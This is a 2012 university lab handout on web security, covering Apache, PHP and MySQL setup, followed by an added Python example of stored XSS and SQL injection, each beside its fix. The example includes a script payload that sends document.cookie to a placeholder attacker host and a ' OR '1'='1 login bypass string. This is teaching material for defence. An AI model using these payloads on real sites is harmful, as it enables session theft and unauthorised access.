GT ECE 4112 - Web Security
ECE4112 Internetwork Security
Lab 9: Web Security

Group Number: ____________
Member Names: _______________________ _______________________

Date Assigned: March 21, 2012
Due Date: March 29, 2012

Please read the entire lab and any extra materials carefully before starting. Be sure to start early enough so that you will have time to complete the lab. Answer ALL questions on the Answer Sheet and be sure you turn in ALL materials listed in the Turn-in Checklist on or before the date due.

Goal: This lab will introduce you to several security issues involving web server software and web applications.

Summary: In this lab you will learn several techniques for attacking web applications, and how to defend against them. First you will learn about Cross Site Scripting (XSS) and use that knowledge to experiment with a cross site scripting exploit. Then you will learn about SQL injection, use it to break into a database-driven website, and explain how to protect against such attacks. Finally, a practical exercise ties these together.

Requirements:
- Red Hat WS 4
- SPI Dynamics VMware machine

Notes:
- If you get a blank page when you open index.php in Firefox, make sure all users have read permission on the index.php file. The original note suggests "chmod 777 index.php"; "chmod 644 index.php" gives the web server the read permission it needs without also making the file world-writable and executable, which 777 does (any local user could then alter the page the server serves).
- When setting up apache2, the AddType directive in httpd.conf should be "AddType application/x-httpd-php .php" (there is a space between -php and .php).

Section 0: Setup

I. Setting up Apache

Apache should already be installed on your Red Hat WS 4.0 machine. If it is not, follow the directions given in Lab 2. Make sure you have a directory called apache2 somewhere on your machine; possible locations are /home/apache2, /usr/local/apache2 or /var/local/apache2.

In order to use PHP, we must modify the server's configuration file, httpd.conf, located under the apache2 directory (conf/httpd.conf). The following lines must be added; the best way is to search for each in the config file and place it below the commented example:

    LoadModule php4_module modules/libphp4.so
    DirectoryIndex index.html index.html.var index.php    (this replaces the existing DirectoryIndex line)
    AddType application/x-httpd-php .php

For reference, an httpd.conf file is placed on nas4112/Lab9/Examples.

II. Setting up PHP

Now that the Apache server is configured, we need to make sure it can interpret a PHP file located in .../apache2/htdocs. First, locate php.ini (use the locate command; you may have to run updatedb first). Most likely php.ini is in /etc/. Open php.ini and set the document root to the path of your htdocs directory. For example, if apache2 is located in /usr/local, find the line in php.ini starting with doc_root and set it to:

    doc_root = "/usr/local/apache2/htdocs/"

Depending on the location of the apache2 directory, the above line may differ. Once you have done this, test PHP by creating a sample file in apache2/htdocs called test.php containing:

    <?php phpinfo(); ?>

Now restart Apache:

    # /apache2/bin/apachectl restart

If you receive an error that the libphp4.so module was not found, locate libphp4.so (probably in /usr/lib/httpd/modules/) and copy it to /apache2/modules. Open a web browser and go to http://localhost/test.php. If you see a page with a lot of information formatted in a nice table, you have succeeded.

III. Setting up MySQL

To configure MySQL, open a terminal as root and run:

    # service mysqld start
    # mysqladmin -u root password password3

In this lab we will use one database with three tables: one stores captured cookie information, one is used for a message board, and the third stores login information. To create them, first get a mysql> prompt by typing "mysql -u root -h localhost -p" and entering your password, then type the following commands. NOTE: All SQL commands are provided in commands.sql under /Lab9 for copying.

    mysql> create database ece4112;
    mysql> use ece4112;

To create the cookies table:

    mysql> CREATE TABLE `cookies` (
             `id` int(11) NOT NULL auto_increment,
             `username` varchar(100) NOT NULL default '',
             `password` varchar(100) NOT NULL default '',
             PRIMARY KEY (`id`)
           ) ENGINE=InnoDB DEFAULT CHARSET=latin1 AUTO_INCREMENT=7 ;
    mysql> INSERT INTO `cookies` VALUES (6, 'testertest', 'hilohilo');

To create the message board table:

    mysql> CREATE TABLE `messages` (
             `msg_id` int(11) NOT NULL auto_increment,
             `title` varchar(50) NOT NULL default '',
             `body` text NOT NULL,
             PRIMARY KEY (`msg_id`)
           ) ENGINE=InnoDB DEFAULT CHARSET=latin1 AUTO_INCREMENT=19 ;
    mysql> INSERT INTO `messages` VALUES (1, 'Test Message 1', 'This is a test.');
    mysql> INSERT INTO `messages` VALUES (2, 'Test Message 2', 'This is another test.');
    mysql> INSERT INTO `messages` VALUES (3, 'We love 4112', 'What a great message.');
    mysql> INSERT INTO `messages` VALUES (4, '42', 'Meaning of life the universe and everything.');
    mysql> INSERT INTO `messages` VALUES (5, 'Hello', 'Hey everyone!');
    mysql> INSERT INTO `messages` VALUES (6, 'We need more messages', 'Here is yet another message!');
    mysql> INSERT INTO `messages` VALUES (7, 'Yo dude', 'Jeff should type more of these.');
    mysql> INSERT INTO `messages` VALUES (8, 'Lalala', 'Typing messages for people.');
    mysql> INSERT INTO `messages` VALUES (9, 'Yet another message', 'Here is a hint. Post a message.');

To create the users table (note that the lab stores passwords in clear text in an 8-character column, which is part of what makes this application a target):

    mysql> CREATE TABLE `users` (
             `user_id` int(11) NOT NULL auto_increment,
             `first_name` varchar(50) NOT NULL default '',
             `last_name` varchar(50) NOT NULL default '',
             `address` varchar(50) NOT NULL default '',
             `city` varchar(50) NOT NULL default '',
             `state` char(2) NOT NULL default '',
             `zip` varchar(5) NOT NULL default '',
             `phone` varchar(10) NOT NULL default '',
             `email` varchar(50) NOT NULL default '',
             `password` varchar(8) NOT NULL default 'password',
             PRIMARY KEY (`user_id`)
           ) ENGINE=InnoDB DEFAULT CHARSET=latin1 AUTO_INCREMENT=5 ;
    mysql> INSERT INTO `users` VALUES (1, 'Jeff', 'Jo', '1008 State Street', 'Atlanta', 'GA', '30318', '4041234567', '[email protected]', 'password');
    mysql> INSERT INTO `users` VALUES (2, 'Tim', 'Jackson', '342 Hempill Avenue', 'Atlanta', 'GA', '30318', '7704325543',
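The two attack classes the Summary names, a stored cross site scripting exploit on the message board and SQL injection against the login data in the users table, are illustrated below in an added example. This is not code from the lab handout or from the lab's PHP pages (which are not on this page): the query and rendering functions are a hypothetical stand-in written in Python, the tables are an in-memory SQLite copy of the handout's `messages` and `users` schema (MySQL types adapted, unused columns dropped), the seed rows are constructed, and the attacker host name is a placeholder.

```python
# Added illustration, not part of the ECE4112 Lab 9 handout.
# Stored XSS on the message board and SQL injection on the login page,
# each shown as the vulnerable form beside the fixed form, against an
# in-memory SQLite copy of the lab's `messages` and `users` tables.
import html
import sqlite3


def make_db() -> sqlite3.Connection:
    """Create trimmed `messages` and `users` tables (schema adapted from
    the handout's MySQL DDL) and seed them with constructed rows; the
    email address is a placeholder, not the one in the lab."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE messages (
            msg_id INTEGER PRIMARY KEY AUTOINCREMENT,
            title  VARCHAR(50) NOT NULL DEFAULT '',
            body   TEXT NOT NULL
        );
        CREATE TABLE users (
            user_id    INTEGER PRIMARY KEY AUTOINCREMENT,
            first_name VARCHAR(50) NOT NULL DEFAULT '',
            last_name  VARCHAR(50) NOT NULL DEFAULT '',
            email      VARCHAR(50) NOT NULL DEFAULT '',
            password   VARCHAR(8)  NOT NULL DEFAULT 'password'  -- clear text, as in the lab
        );
        """
    )
    db.execute("INSERT INTO messages VALUES (1, 'Test Message 1', 'This is a test.')")
    db.execute("INSERT INTO users VALUES (1, 'Jeff', 'Jo', 'jeff@example.com', 'password')")
    db.commit()
    return db


# ---- message board: stored XSS ------------------------------------------

def post_message(db: sqlite3.Connection, title: str, body: str) -> None:
    """Store a post. The write is parameterised; the XSS bug is in rendering."""
    db.execute("INSERT INTO messages (title, body) VALUES (?, ?)", (title, body))
    db.commit()


def render_board_vulnerable(db: sqlite3.Connection) -> str:
    """Interpolate stored text straight into HTML: a <script> posted once
    is served to every later reader (stored, or persistent, XSS)."""
    rows = db.execute("SELECT title, body FROM messages ORDER BY msg_id")
    return "".join(f"<h2>{title}</h2><p>{body}</p>" for title, body in rows)


def render_board_safe(db: sqlite3.Connection) -> str:
    """Same page with every stored value HTML-escaped on output."""
    rows = db.execute("SELECT title, body FROM messages ORDER BY msg_id")
    return "".join(
        f"<h2>{html.escape(title)}</h2><p>{html.escape(body)}</p>"
        for title, body in rows
    )


# ---- login page: SQL injection ------------------------------------------

def login_vulnerable(db: sqlite3.Connection, email: str, password: str):
    """Build the WHERE clause by string concatenation (the injection bug).
    Returns the matching user_id, or None."""
    sql = (
        "SELECT user_id FROM users WHERE email = '" + email
        + "' AND password = '" + password + "'"
    )
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(db: sqlite3.Connection, email: str, password: str):
    """Same query with bound parameters: user input stays data, never SQL."""
    sql = "SELECT user_id FROM users WHERE email = ? AND password = ?"
    row = db.execute(sql, (email, password)).fetchone()
    return row[0] if row else None


# Constructed attacker inputs. attacker.example is a placeholder host.
XSS_PAYLOAD = (
    "<script>new Image().src='http://attacker.example/c?'"
    "+document.cookie</script>"
)
# Turns the clause into  ... AND password = '' OR '1'='1'  which is true
# for every row, so the first user is returned regardless of email.
SQLI_PASSWORD = "' OR '1'='1"


if __name__ == "__main__":
    db = make_db()
    post_message(db, "hi", XSS_PAYLOAD)
    print("raw render serves the script tag:", "<script>" in render_board_vulnerable(db))
    print("escaped render serves the script tag:", "<script>" in render_board_safe(db))
    print("concatenated login as 'nobody':", login_vulnerable(db, "nobody", SQLI_PASSWORD))
    print("parameterised login as 'nobody':", login_safe(db, "nobody", SQLI_PASSWORD))
```

The XSS payload is the classic cookie-exfiltration form (a request to an attacker-controlled host with document.cookie appended), which is what a page behind a captured-cookies table would be built to receive; the fix is escaping at output time, not filtering at input time. The injection bypass works because AND binds tighter than OR, so the injected `OR '1'='1'` makes the whole predicate true; bound parameters remove the problem because the quote characters in the input are never parsed as SQL.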